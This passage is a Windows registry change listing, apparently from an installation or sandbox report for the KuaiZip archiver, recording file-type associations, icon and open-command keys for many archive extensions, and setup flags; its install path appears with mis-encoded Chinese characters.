"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.077\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\KuaiZip.050]
"(Default)" = "快压 050 压缩文件"

[HKCR\KuaiZip.020\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.059]
"(Default)" = "快压 059 压缩文件"

[HKCR\KuaiZip_FileAsso.Origin\.034]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.053]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.067]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.kz]
"(Default)" = ""

[HKCR\KuaiZip_FileAsso.Origin\.007]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.019]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.055]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.061]
"set" = "1"

[HKCR\KuaiZip.024]
"(Default)" = "快压 024 压缩文件"

[HKCR\KuaiZip_FileAsso.Origin\.015]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.044]
"(Default)" = "快压 044 压缩文件"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.023]
"set" = "1"

[HKCR\.048]
"(Default)" = "KuaiZip.048"

[HKCR\KuaiZip_FileAsso.Origin\.078]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.051]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.056]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.051]
"(Default)" = "NoAssociate.KZ"

[HKCR\.042]
"(Default)" = "KuaiZip.042"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\KuaiZip.wim\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.023]
"(Default)" = "快压 023 压缩文件"

[HKCR\KuaiZip.053\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.020]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.059\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.mou]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.022]
"(Default)" = "NoAssociate.KZ"

[HKCR\.008]
"(Default)" = "KuaiZip.008"

[HKCR\KuaiZip.047\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.047]
"set" = "1"

[HKCR\KuaiZip.017\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\.009]
"(Default)" = "KuaiZip.009"

[HKCR\KuaiZip.013\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.096\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\.019]
"(Default)" = "KuaiZip.019"

[HKCR\KuaiZip.wim\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.085]
"(Default)" = "快压 085 压缩文件"

[HKCR\KuaiZip_FileAsso.Origin\.039]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.036]
"(Default)" = "快压 036 压缩文件"

[HKCR\KuaiZip_FileAsso.Origin\.064]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.tgz]
"set" = "1"

[HKCR\.002]
"(Default)" = "KuaiZip.002"

[HKCR\.018]
"(Default)" = "KuaiZip.018"

[HKCR\KuaiZip_FileAsso.Origin\.030]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.021]
"(Default)" = "快压 021 压缩文件"

[HKCR\KuaiZip.jar\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.065\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.083]
"(Default)" = "快压 083 压缩文件"

[HKCR\KuaiZip.049\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.048\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.025]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.017]
"set" = "1"

[HKCR\KuaiZip.037]
"(Default)" = "快压 037 压缩文件"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.015]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.012]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.069]
"set" = "1"

[HKCR\KuaiZip.074]
"(Default)" = "快压 074 压缩文件"

[HKCR\KuaiZip.004\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.04]
"(Default)" = "快压 04 压缩文件"

[HKCR\KuaiZip.022]
"(Default)" = "快压 022 压缩文件"

[HKCR\.022]
"(Default)" = "KuaiZip.022"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.021]
"set" = "1"

[HKCR\.028]
"(Default)" = "KuaiZip.028"

[HKCR\KuaiZip.049\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.049]
"(Default)" = "快压 049 压缩文件"

[HKCR\.015]
"(Default)" = "KuaiZip.015"

[HKCR\KuaiZip.082\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.009]
"(Default)" = "快压 009 压缩文件"

[HKCR\.020]
"(Default)" = "KuaiZip.020"

[HKCR\KuaiZip.wim]
"(Default)" = "快压 WIM 压缩文件"

[HKCR\KuaiZip.019]
"(Default)" = "快压 019 压缩文件"

[HKCR\KuaiZip.050\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\.093]
"(Default)" = "KuaiZip.093"

[HKCR\.095]
"(Default)" = "KuaiZip.095"

[HKCR\KuaiZip.071\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.038]
"set" = "1"

[HKCR\KuaiZip.090\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.044\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.wim]
"set" = "1"

[HKCR\.049]
"(Default)" = "KuaiZip.049"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.01]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.06]
"set" = "1"

[HKCR\KuaiZip.036\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.002]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.072]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.048\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.018]
"(Default)" = "快压 018 压缩文件"

[HKCR\KuaiZip_FileAsso.Origin\.09]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.zip]
"set" = "1"

[HKCR\KuaiZip.073\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.006]
"(Default)" = "快压 006 压缩文件"

[HKCR\KuaiZip_FileAsso.Origin\.wim]
"(Default)" = "NoAssociate.KZ"

[HKCR\.075]
"(Default)" = "KuaiZip.075"

[HKCR\KuaiZip.078\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.cab\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.098\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.02]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.085]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.bz2\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.038]
"(Default)" = "快压 038 压缩文件"

[HKCR\KuaiZip.04\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\.013]
"(Default)" = "KuaiZip.013"

[HKCR\.072]
"(Default)" = "KuaiZip.072"

[HKCR\KuaiZip.z\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.019]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.084]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.052]
"(Default)" = "快压 052 压缩文件"

[HKCR\KuaiZip.048]
"(Default)" = "快压 048 压缩文件"

[HKCR\KuaiZip.078\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.008]
"(Default)" = "快压 008 压缩文件"

[HKCR\KuaiZip.069\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\.099]
"(Default)" = "KuaiZip.099"

[HKCR\KuaiZip.060\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.093]
"set" = "1"

[HKCR\.014]
"(Default)" = "KuaiZip.014"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.005]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.083]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.088]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.067\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.gz]
"(Default)" = "快压 GZ 压缩文件"

[HKCR\.074]
"(Default)" = "KuaiZip.074"

[HKCR\KuaiZip_FileAsso.Origin\.077]
"(Default)" = "NoAssociate.KZ"

[HKCR\.06]
"(Default)" = "KuaiZip.06"

[HKCR\KuaiZip_FileAsso.Origin\.058]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.gz]
"(Default)" = ""

[HKCU\Software\KuaiZip\KuaiZip\Setup\.006]
"set" = "1"

[HKCR\.023]
"(Default)" = "KuaiZip.023"

[HKCR\KuaiZip_FileAsso.Origin\.tar]
"(Default)" = ""

[HKCR\KuaiZip.089]
"(Default)" = "快压 089 压缩文件"

[HKCR\KuaiZip_FileAsso.Origin\.cab]
"(Default)" = "CLSID\{0CD7A5C0-9F37-11CE-AE65-08002B2E1262}"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.090]
"set" = "1"

[HKCR\KuaiZip.013\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.076]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.05\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.012\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\.055]
"(Default)" = "KuaiZip.055"

[HKCR\KuaiZip.074\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.074]
"(Default)" = "NoAssociate.KZ"

[HKCR\.073]
"(Default)" = "KuaiZip.073"

[HKCR\KuaiZip_FileAsso.Origin\.7z]
"(Default)" = ""

[HKCR\KuaiZip.005\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.016]
"(Default)" = "快压 016 压缩文件"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.092]
"set" = "1"

[HKCR\.058]
"(Default)" = "KuaiZip.058"

[HKCR\KuaiZip.093]
"(Default)" = "快压 093 压缩文件"

[HKCR\KuaiZip.015\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.001\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.056\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.bz2]
"(Default)" = "快压 BZ2 压缩文件"

[HKCR\KuaiZip_FileAsso.Origin\.026]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.kz\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\.027]
"(Default)" = "KuaiZip.027"

[HKCR\KuaiZip.gz\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.005]
"(Default)" = "快压 005 压缩文件"

[HKCR\.037]
"(Default)" = "KuaiZip.037"

[HKCR\KuaiZip_FileAsso.Origin\.080]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.061\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.093\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\.080]
"(Default)" = "KuaiZip.080"

[HKCR\KuaiZip.082\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\.lzh]
"(Default)" = "KuaiZip.lzh"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.074]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.011]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.010]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.gzip]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.01]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.046]
"(Default)" = "NoAssociate.KZ"

[HKCR\.050]
"(Default)" = "KuaiZip.050"

[HKCR\KuaiZip.067]
"(Default)" = "快压 067 压缩文件"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.054]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.029]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.lzh]
"(Default)" = "快压 LZH 压缩文件"

[HKCR\KuaiZip_FileAsso.Origin\.arj]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.030]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.024]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.06\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.066\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.080]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.029]
"set" = "1"

[HKCR\.033]
"(Default)" = "KuaiZip.033"

[HKCR\KuaiZip.054\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.040]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.092\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.032]
"(Default)" = "NoAssociate.KZ"

[HKCR\.059]
"(Default)" = "KuaiZip.059"

[HKCR\KuaiZip.08\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.093\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.053\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.07]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.003\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.044]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.001\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.arj\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.030\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.096]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.043]
"set" = "1"

[HKCR\KuaiZip.004]
"(Default)" = "快压 004 压缩文件"

[HKCR\KuaiZip.077\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.091]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.035]
"set" = "1"

[HKCR\KuaiZip.gzip\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.cab]
"set" = "1"

[HKCR\KuaiZip.030\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.027]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.032]
"(Default)" = "快压 032 压缩文件"

[HKCR\.091]
"(Default)" = "KuaiZip.091"

[HKCR\KuaiZip.064\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.08]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.095\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.048]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.jar]
"set" = "1"

[HKCR\.096]
"(Default)" = "KuaiZip.096"

[HKCR\KuaiZip.055]
"(Default)" = "快压 055 压缩文件"

[HKCR\.038]
"(Default)" = "KuaiZip.038"

[HKCR\KuaiZip_FileAsso.Origin\.014]
"(Default)" = "NoAssociate.KZ"

[HKCR\.062]
"(Default)" = "KuaiZip.062"

[HKCR\KuaiZip_FileAsso.Origin\.060]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.arj]
"(Default)" = "快压 ARJ 压缩文件"

[HKCR\KuaiZip_FileAsso.Origin\.06]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.063\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\.01]
"(Default)" = "KuaiZip.01"

[HKCR\KuaiZip.tar\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.kz]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.032]
"set" = "1"

[HKCR\.03]
"(Default)" = "KuaiZip.03"

[HKCR\KuaiZip.058\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.071]
"(Default)" = "快压 071 压缩文件"

[HKCR\KuaiZip.023\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.066]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.007\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.037]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.zip]
"(Default)" = "快压 ZIP 压缩文件"

[HKCR\KuaiZip_FileAsso.Origin\.086]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.091\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.jar]
"(Default)" = "快压 JAR 压缩文件"

[HKCR\KuaiZip.080\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.046\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.tar]
"(Default)" = "快压 TAR 压缩文件"

[HKCR\.wim]
"(Default)" = "KuaiZip.wim"

[HKCR\KuaiZip.032\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.086\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.031\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.08]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\TreePanel]
"Visable" = "0"

[HKCR\KuaiZip_FileAsso.Origin\.062]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.033\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\.mou]
"(Default)" = "KuaiZip.mou"

[HKCR\KuaiZip.051\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.02\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.062]
"set" = "1"

[HKCR\.088]
"(Default)" = "KuaiZip.088"

[HKCR\KuaiZip.rar\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.07\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.014\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.073]
"set" = "1"

[HKCR\KuaiZip.7z\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,3"

[HKCR\KuaiZip.098\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.070\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.075]
"(Default)" = "NoAssociate.KZ"

[HKCR\.044]
"(Default)" = "KuaiZip.044"

[HKCR\KuaiZip.014\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.072]
"set" = "1"

[HKCR\KuaiZip.039\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\.gz]
"(Default)" = "KuaiZip.gz"

[HKCR\KuaiZip.050\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.098]
"set" = "1"

[HKCR\KuaiZip.088]
"(Default)" = "快压 088 压缩文件"

[HKCR\KuaiZip.057]
"(Default)" = "快压 057 压缩文件"

[HKCR\KuaiZip.061]
"(Default)" = "快压 061 压缩文件"

[HKCR\KuaiZip.030]
"(Default)" = "快压 030 压缩文件"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.065]
"set" = "1"

[HKCR\KuaiZip.097]
"(Default)" = "快压 097 压缩文件"

[HKCR\.08]
"(Default)" = "KuaiZip.08"

[HKCR\KuaiZip.084]
"(Default)" = "快压 084 压缩文件"

[HKCR\.tgz]
"(Default)" = "KuaiZip.tgz"

[HKCR\KuaiZip.042\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.rpm\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\.078]
"(Default)" = "KuaiZip.078"

[HKCR\KuaiZip.091]
"(Default)" = "快压 091 压缩文件"

[HKCR\KuaiZip.068\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.09\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.049]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.008]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.05\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\.065]
"(Default)" = "KuaiZip.065"

[HKCR\.063]
"(Default)" = "KuaiZip.063"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.079]
"set" = "1"

[HKCR\KuaiZip.092]
"(Default)" = "快压 092 压缩文件"

[HKCR\KuaiZip.040]
"(Default)" = "快压 040 压缩文件"

[HKCR\KuaiZip_FileAsso.Origin\.rar]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.tar\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.029]
"(Default)" = "快压 029 压缩文件"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.rar]
"set" = "1"

[HKCR\KuaiZip.080]
"(Default)" = "快压 080 压缩文件"

[HKCR\KuaiZip.024\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.jar]
"(Default)" = "jarfile"

[HKCR\KuaiZip.076\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.096]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.013]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.044\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.022]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.097]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.027]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.04]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.035]
"(Default)" = "快压 035 压缩文件"

[HKCR\KuaiZip.081\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.062\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.050]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.099\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.029\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.024\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.070]
"(Default)" = "快压 070 压缩文件"

[HKCR\.zip]
"(Default)" = "KuaiZip.zip"

[HKCR\KuaiZip.082]
"(Default)" = "快压 082 压缩文件"

[HKCR\KuaiZip_FileAsso.Origin\.090]
"(Default)" = "NoAssociate.KZ"

[HKCR\.084]
"(Default)" = "KuaiZip.084"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.011]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.001]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.057]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.08\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

